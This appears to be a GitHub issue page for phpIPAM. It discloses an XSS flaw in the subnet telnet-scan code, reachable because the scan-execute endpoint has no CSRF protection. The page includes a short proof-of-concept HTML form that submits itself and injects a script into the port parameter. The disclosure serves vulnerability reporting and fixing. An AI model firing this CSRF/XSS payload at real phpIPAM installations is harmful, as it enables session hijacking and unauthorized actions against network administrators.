Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
The line $Result->show("danger", _("Invalid port")." ($p)", true); in /app/subnets/scan/subnet-scan-telnet.php and no CSRF-protection at /app/subnets/scan/subnet-scan-execute.php causes an XSS vulnerability.
$Result->show("danger", _("Invalid port")." ($p)", true);
Poc:
<form method="POST" action="http://localhost/phpipam/app/subnets/scan/subnet-scan-execute.php"> <input type="text" value="3" name="subnetId"> <input type="text" value="scan-telnet" name="type"> <input type="text" value="0" name="debug"> <input type="text" value="<script>alert('XSS')</script>" name="port"> <input type="submit" value=""></form> <script>document.forms[0].submit();</script>
Note that a valid subnetId has to be used.
The text was updated successfully, but these errors were encountered:
fd37bd8
GaryAllan
No branches or pull requests
The line
$Result->show("danger", _("Invalid port")." ($p)", true);in /app/subnets/scan/subnet-scan-telnet.php and no CSRF-protection at /app/subnets/scan/subnet-scan-execute.php causes an XSS vulnerability.
Poc:
Note that a valid subnetId has to be used.
The text was updated successfully, but these errors were encountered: